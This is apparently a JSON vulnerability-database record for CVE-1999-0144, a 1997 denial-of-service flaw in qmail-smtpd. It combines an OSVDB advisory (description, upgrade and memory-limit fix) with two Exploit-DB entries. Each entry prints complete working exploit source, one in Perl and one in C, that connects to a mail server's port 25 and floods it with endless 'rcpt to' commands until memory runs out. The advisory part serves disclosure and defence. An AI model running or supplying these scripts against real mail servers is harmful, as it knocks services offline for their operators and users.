{"osvdb": [{"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nqmail-smtpd contains a flaw that may allow a remote denial of service. The issue is triggered by sending an email with a large number of recipient addresses. Qmail will attempt to process such message, which will consume all memory on the server host, and will result in loss of availability for this computer.\n## Solution Description\nUpgrade to version 1.03 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: limit amount of memory available to the qmail-smtpd process.\n## Short Description\nqmail-smtpd contains a flaw that may allow a remote denial of service. The issue is triggered by sending an email with a large number of recipient addresses. Qmail will attempt to process such message, which will consume all memory on the server host, and will result in loss of availability for this computer.\n## References:\n[Vendor Specific Advisory URL](http://cr.yp.to/qmail/venema.html)\nOther Advisory URL: http://www.ornl.gov/lists/mailing-lists/qmail/1997/06/msg00322.html\nISS X-Force ID: 208\n[CVE-1999-0144](https://vulners.com/cve/CVE-1999-0144)\nBugtraq ID: 2237\n", "modified": "1997-06-12T00:00:00", "published": "1997-06-12T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:5850", "id": "OSVDB:5850", "type": "osvdb", "title": "Qmail RCPT TO Command Remote Overflow", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T14:31:45", "bulletinFamily": "exploit", "description": "Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (1). CVE-1999-0144. Dos exploit for linux platform", "modified": "1997-06-12T00:00:00", "published": "1997-06-12T00:00:00", "id": "EDB-ID:20561", "href": "https://www.exploit-db.com/exploits/20561/", "type": "exploitdb", "title": "Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/2237/info\r\n\r\nqmail is an e-mail server package developed by Dan Bernstein.\r\n\r\nThe qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.\r\n\r\nThis behaviour is due to the dynamically allocated memory being exhausted.\r\n\r\nThe condition occurs in situations where resource limits are not imposed on the server process.\r\n\r\nMany systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.\r\n\r\nOnce affected, a restart of the qmail smtp service is required in order to gain normal functionality.\r\n\r\nIt should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.\r\n\r\n#!/usr/local/bin/perl -w\r\n# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $\r\nrequire 5.002;\r\nuse strict;\r\nuse Socket;\r\nif(!($ARGV[0])){print(\"usage: $0 FQDN\",\"\\n\");exit;}\r\nmy $port = 25; my $proto = getprotobyname(\"tcp\");\r\nmy $iaddr = inet_aton($ARGV[0]) || die \"No such host: $ARGV[0]\";\r\nmy $paddr = sockaddr_in($port, $iaddr);\r\nsocket(SKT, AF_INET, SOCK_STREAM, $proto) || die \"socket() $!\";\r\nconnect(SKT, $paddr) && print(\"Connected established.\\n\") || die \"connect() $!\";\r\nsend(SKT,\"mail from: <me\\@me>\\n\",0) || die \"send() $!\";\r\nmy $infstr = \"rcpt to: <me\\@\" . $ARGV[0] . \">\\n\"; print(\"Attacking..\",\"\\n\");\r\nwhile(<SKT>){\r\nsend(SKT,$infstr,0) || die \"send() $!\";\r\n}\r\ndie \"Connection lost!\";\r\n\r\n\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20561/"}, {"lastseen": "2016-02-02T14:31:53", "bulletinFamily": "exploit", "description": "Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (2). CVE-1999-0144. Dos exploit for linux platform", "modified": "1997-06-12T00:00:00", "published": "1997-06-12T00:00:00", "id": "EDB-ID:20562", "href": "https://www.exploit-db.com/exploits/20562/", "type": "exploitdb", "title": "Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/2237/info\r\n \r\nqmail is an e-mail server package developed by Dan Bernstein.\r\n \r\nThe qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.\r\n \r\nThis behaviour is due to the dynamically allocated memory being exhausted.\r\n \r\nThe condition occurs in situations where resource limits are not imposed on the server process.\r\n \r\nMany systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.\r\n \r\nOnce affected, a restart of the qmail smtp service is required in order to gain normal functionality.\r\n \r\nIt should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.\r\n\r\n/*\r\n * qmail-dos-2 - run a qmail system out of swap space by feeding an infinite\r\n * amount of recipients.\r\n *\r\n * Usage: qmail-dos-2 fully-qualified-hostname\r\n *\r\n * Author: Wietse Venema. The author is not responsible for abuse of this\r\n * program. Use at your own risk.\r\n */\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <string.h>\r\n#include <stdarg.h>\r\n#include <errno.h>\r\n#include <stdio.h>\r\n\r\nvoid fatal(char *fmt,...)\r\n{\r\n va_list ap;\r\n\r\n va_start(ap, fmt);\r\n vfprintf(stderr, fmt, ap);\r\n va_end(ap);\r\n putc('\\n', stderr);\r\n exit(1);\r\n}\r\n\r\nchat(FILE * fp, char *fmt,...)\r\n{\r\n char buf[BUFSIZ];\r\n va_list ap;\r\n\r\n fseek(fp, 0L, SEEK_SET);\r\n va_start(ap, fmt);\r\n vfprintf(fp, fmt, ap);\r\n va_end(ap);\r\n fputs(\"\\r\\n\", fp);\r\n if (fflush(fp))\r\n fatal(\"connection lost\");\r\n fseek(fp, 0L, SEEK_SET);\r\n if (fgets(buf, sizeof(buf), fp) == 0)\r\n fatal(\"connection lost\");\r\n if (atoi(buf) / 100 != 2)\r\n fatal(\"%s\", buf);\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n struct sockaddr_in sin;\r\n struct hostent *hp;\r\n char buf[BUFSIZ];\r\n int sock;\r\n FILE *fp;\r\n\r\n if (argc != 2)\r\n fatal(\"usage: %s host\", argv[0]);\r\n if ((hp = gethostbyname(argv[1])) == 0)\r\n fatal(\"host %s not found\", argv[1]);\r\n memset((char *) &sin, 0, sizeof(sin));\r\n sin.sin_family = AF_INET;\r\n memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));\r\n sin.sin_port = htons(25);\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n fatal(\"socket: %s\", strerror(errno));\r\n if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)\r\n fatal(\"connect to %s: %s\", argv[1], strerror(errno));\r\n if ((fp = fdopen(sock, \"r+\")) == 0)\r\n fatal(\"fdopen: %s\", strerror(errno));\r\n if (fgets(buf, sizeof(buf), fp) == 0)\r\n fatal(\"connection lost\");\r\n chat(fp, \"mail from:<me@me>\", fp);\r\n for (;;)\r\n chat(fp, \"rcpt to:<me@%s>\", argv[1]);\r\n}\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20562/"}]}